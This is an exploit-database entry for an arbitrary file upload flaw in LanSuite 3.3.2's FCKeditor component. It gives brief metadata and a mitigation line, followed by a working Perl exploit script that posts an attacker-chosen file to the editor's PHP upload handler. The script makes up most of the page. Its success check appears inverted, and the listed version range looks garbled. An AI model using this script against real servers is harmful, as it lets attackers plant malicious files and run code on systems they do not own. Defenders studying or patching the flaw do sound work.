LanSuite 3.3.2 (fckeditor) Arbitrary File Upload

vendor:

LanSuite 3.3.2

by:

Stack

9.3

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: LanSuite 3.3.2

Affected Version From: 3.3.2002

Affected Version To: 3.3.2002

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

LanSuite 3.3.2 (fckeditor) Arbitrary File Upload

LanSuite 3.3.2 is vulnerable to an arbitrary file upload vulnerability. This vulnerability allows an attacker to upload a malicious file to the server, which can be used to execute arbitrary code. The vulnerability exists due to insufficient validation of the uploaded file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious file to the vulnerable server.

Mitigation:

Upgrade to the latest version of LanSuite 3.3.2 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload  +
+                                                   +
+                   By: Stack                       +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
    chomp(my $url=<STDIN>);
  
print "Enter File Path(path to local file to upload): ";
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
                      Content_Type => 'form-data',
                      Content      => [ NewFile => $file ] );
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
    else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;

# milw0rm.com [2008-09-25]